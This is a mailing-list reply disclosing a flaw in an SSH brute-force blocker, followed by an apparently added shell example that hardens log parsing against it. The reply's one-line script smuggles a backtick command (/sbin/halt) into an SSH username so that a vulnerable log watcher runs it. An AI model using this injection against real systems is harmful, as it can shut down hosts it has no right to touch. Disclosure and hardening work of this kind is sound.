On Mon, Nov 27, 2006 at 02:22:10PM -0500, J. Oquendo wrote:
> For those interested, I wrote a program called Sharpener which is an SSH
> brute force blocking tool that also reports back the offenders'
> addresses. I have begun posting the information on the attackers as well
> as sending out messages (whenever possible) to the admins of these
> domains. Think of it as an RBL for SSH attackers. The goal is to
> identify these machines in order for others to implement safeguards
> (ACLs) against these hosts. Feel free to comment/complain.
>
>
> http://www.infiltrated.net/sharpener (tool)
> http://www.infiltrated.net/bruteforcers (offenders)

Nice work, really subtle rootkit. I like the email phone-home. Here's an
exploit.

#!/bin/sh
ssh 'foo bar `/sbin/halt`'@victim

--
-------------------------------------
[EMAIL PROTECTED] | finger me for my pgp key.
-------------------------------------------------------

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
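
The username in the reply's script carries a backtick command substitution, so any log watcher that pastes that field into a shell command would run it. The following is an added example, not part of the original thread and not Sharpener's code: a hypothetical blocker helper (`extract_offender_ip`, with an assumed "Invalid user ... from ADDR" log format and a constructed log line) that never touches the username and accepts only a strictly validated IPv4 address.

```shell
#!/bin/sh
# Added example: treat every field of an sshd log line as untrusted data.
# The log format and the sample line are assumptions made for illustration.
#
# Unsafe pattern (hypothetical, shown only as a comment, never run here):
#   user=$(echo "$line" | awk '{print $8}')
#   eval "echo blocked $user"      # backticks inside $user would execute
#
# Hardened pattern: pull out only the source address, validate it against
# a strict IPv4 grammar, and hand it on as one quoted argument.

# Print the source IPv4 address of a failed-login line, or return 1.
extract_offender_ip() {
    line=$1
    case $line in
        *"Invalid user "*" from "*) ;;
        *) return 1 ;;
    esac
    # Use the text after the LAST " from " so a username that itself
    # contains " from " cannot shift the field.
    ip=${line##* from }
    ip=${ip%% *}
    # Only digits and dots, no empty, leading, trailing or doubled dots.
    case $ip in
        ''|*[!0-9.]*|.*|*.|*..*) return 1 ;;
    esac
    old_ifs=$IFS; IFS=.
    set -- $ip                     # safe: $ip holds only digits and dots
    IFS=$old_ifs
    [ $# -eq 4 ] || return 1
    for octet in "$@"; do
        [ ${#octet} -le 3 ] && [ "$octet" -le 255 ] || return 1
    done
    printf '%s\n' "$ip"
}

# Constructed sample: the username field is the one from the reply above.
# Single quotes keep the backticks literal; nothing is executed.
sample='Nov 27 14:22:10 host sshd[1234]: Invalid user foo bar `/sbin/halt` from 192.0.2.10'
if addr=$(extract_offender_ip "$sample"); then
    printf 'would block: %s\n' "$addr"
fi
```

Whatever consumes the address afterwards should receive it as a quoted argument ("$addr"), never through `eval` or an unquoted string built from the log line.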